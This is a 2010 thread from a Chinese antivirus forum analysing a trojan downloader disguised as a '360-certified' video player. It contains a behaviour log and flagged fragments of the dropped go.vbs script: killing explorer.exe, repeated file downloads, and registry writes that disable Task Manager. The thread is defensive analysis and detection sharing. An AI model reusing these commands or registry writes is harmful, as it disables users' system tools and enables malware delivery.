楼主: Sherry.ai
收起左侧

[病毒样本] 360认证-Apian专用播放器.exe

  [复制链接]
XE-cj
发表于 2010-8-15 11:48:28 | 显示全部楼层
2010-8-15 11:44:19    创建新进程    允许
进程: c:\windows\explorer.exe
目标: c:\documents and settings\xe-cj\my documents\360认证-apian专用播放器.exe
命令行: "C:\Documents and Settings\XE-CJ\My Documents\360认证-Apian专用播放器.exe"
规则: [应用程序]c:\windows\explorer.exe

2010-8-15 11:44:23    创建文件    允许
进程: c:\documents and settings\xe-cj\my documents\360认证-apian专用播放器.exe
目标: C:\Documents and Settings\XE-CJ\Local Settings\Temp\~DF8D06.tmp
规则: [文件]*

2010-8-15 11:44:25    创建文件    允许
进程: c:\documents and settings\xe-cj\my documents\360认证-apian专用播放器.exe
目标: C:\Documents and Settings\XE-CJ\Local Settings\Temp\go.vbs
规则: [文件组]所有执行文件 -> [文件]*; *.vbs

2010-8-15 11:44:27    创建新进程    阻止
进程: c:\documents and settings\xe-cj\my documents\360认证-apian专用播放器.exe
目标: c:\windows\system32\wscript.exe
命令行: wscript.exe C:\DOCUME~1\XE-CJ\LOCALS~1\Temp\go.vbs
规则: [应用程序]*


go.vbs




zdlzp
发表于 2010-8-15 11:58:17 | 显示全部楼层

godddd="cmd /c taskkill /f /im explorer.exe"

Rem 可能带来威胁:这个脚本可能会结束进程。
godddd="cmd /c taskkill /f /im explorer.exe"

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath1,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath2,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath3,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath4,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath1,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath2,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath3,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath,eval ("2")

Rem 严重警告:这个脚本可能会从网络下载文件!
.savetofile cpath,eval ("2")

Rem 可能带来威胁:这个脚本可能会写入文件。
testfile.writeline(myhhjj)

Rem 严重警告:这个脚本可能会禁用任务管理器!
wshshell.regwrite "hkey_current_user\software\microsoft\windows\currentversion\policies\system\disabletaskmgr",1,"reg_dword"

Rem 可能带来威胁:这个脚本可能会对注册表进行操作。
wshshell.regwrite "hkey_current_user\software\microsoft\windows\currentversion\policies\system\disabletaskmgr",1,"reg_dword"

Rem 可能带来威胁:这个脚本可能会对注册表进行操作。
wshshell.regwrite "hkey_current_user\software\policies\microsoft\mmc\restricttopermittedsnapins",1,"reg_dword"

Rem 可能带来威胁:这个脚本可能会对注册表进行操作。
wshshell.regwrite "hkey_current_user\software\microsoft\windows\currentversion\policies\explorer\nodesktopcleanupwizard",1,"reg_dword" '桌面清理


schumi小粉
发表于 2010-8-15 12:06:52 | 显示全部楼层
运行后很XE



思齐鼠
发表于 2010-8-15 12:13:53 | 显示全部楼层
下载者········
杀软小白鼠
发表于 2010-8-15 12:21:03 | 显示全部楼层
To Norman.
hj5abc
发表于 2010-8-15 12:43:22 | 显示全部楼层
FS
Gen:Trojan.Heur.VP.em0@ayy9pbab
sololp 该用户已被删除
发表于 2010-8-15 12:56:11 | 显示全部楼层
submit to mcafee
54314
发表于 2010-8-15 12:57:04 | 显示全部楼层
毒霸杀,网盾报毒
XMonster
发表于 2010-8-15 13:11:24 | 显示全部楼层

D:\下载\360认证-Apian专用播放器.rar=>360认证-apian专用播放器.exe        具有木马特征程序(HEUR:Trojan/Script.Generic)        已删除
黑衣~魂
发表于 2010-8-15 13:40:34 | 显示全部楼层
to drweb
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-6-10 15:53 , Processed in 0.095486 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表